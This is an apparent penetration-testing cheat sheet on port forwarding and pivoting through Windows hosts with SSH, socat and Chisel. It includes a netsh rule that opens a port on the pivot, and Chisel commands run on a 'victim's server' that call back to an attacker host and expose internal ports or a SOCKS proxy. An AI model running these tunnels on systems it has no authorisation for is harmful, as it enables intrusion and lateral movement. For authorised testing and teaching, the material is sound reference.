Windows port forwarding
1. Port forwarding via SSH
SSH can be used to perform tunneling. Nowadays Windows is distrubuted with the OpenSSH client included by default.
1.1. Remote port forwarding
IP1 IP2 (pivot) IP3
|'''''''| |'''''''| |'''''''|
| port1 | ---------> | SSH | ----------> | port3 |
|,,,,,,,| |,,,,,,,| |,,,,,,,|
ssh <user1>@<ip1> -R <port1>:<ip3>:<port3> -N
Now the ip3:port3
is available from ip1 on user1@localhost:port1
. Port numbers don't need to match. Local port localhost:9999
can be forwarded to the remote RDP 1.1.1.1:3389
service.
1.2. Local port forwarding
IP1 IP2 (pivot) IP3
|'''''''| |'''''''| |'''''''|
| port1 | <--------- | port2 | <---------- |,,,,,,,|
|,,,,,,,| | SSH |
|,,,,,,,|
ssh <user1>@<ip1> -L *:<port1>:127.0.0.1:<port2>
Now the ip1:port1
is available from ip3
via ip2:port2
. In other words, ip2:port2
points to ip1:port1
.
2. Port forwarding with Socat
Socat allows to forward ports in a simpler way than SSH but it have to be transfered to the pivot host.
IP1 IP2 (pivot) IP3
|'''''''| |'''''''| |'''''''|
|,,,,,,,| ---------> | port2 | ----------> | port3 |
| SSH | |,,,,,,,|
|,,,,,,,|
Socat performs some kind of a reversed local port forwarding. It opens local (IP2 pivot) port. It's easier than connecting to the IP1 directly but it might require to create a firewall rule to allow any connections to the opened port.
socat TCP4-LISTEN:<port2>,fork TCP4:<ip3>:<port3>
Now the ip3:port3
is available via ip2:port2
. To open the pivot's port:
netsh advfirewall firewall add rule name="Open Port <port2>" dir=in action=allow protocol=TCP localport=<port2>
3. Chisel tool
Chisel is a swiss-knife tool (Linux and Windows) for any kind of a port forwarding.
3.1. Reverse port-forwarding
It makes connection from the server to the attacker host.
# 1. Run on attacker's host
chisel server --reverse --port 9001
# 2. Run on victim's server (forward :local-port to :open-port)
chisel client <attacker-ip>:9001 R:<open-port>:127.0.0.1:<local-port>
# 3. Now open in browser: http://localhost:<open-port>
3.2. Reverse port-forwarding using SOCKS proxy
It is useful if we want to access many ports on the victim's machine.
# 1. Run on attacker's host
chisel server --reverse --port 9001
# 2. Run on victim's server (forward socks to :open-port)
chisel client 10.0.0.1:9001 R:<open-port>:socks
# 3. Add following line in /etc/proxychains4.conf
socks5 127.0.0.1 <open-port>
Now you can use proxychains
before every command to tunnel the requests to the victim's server. There is also configuration in the Burp Suite
for that purpose.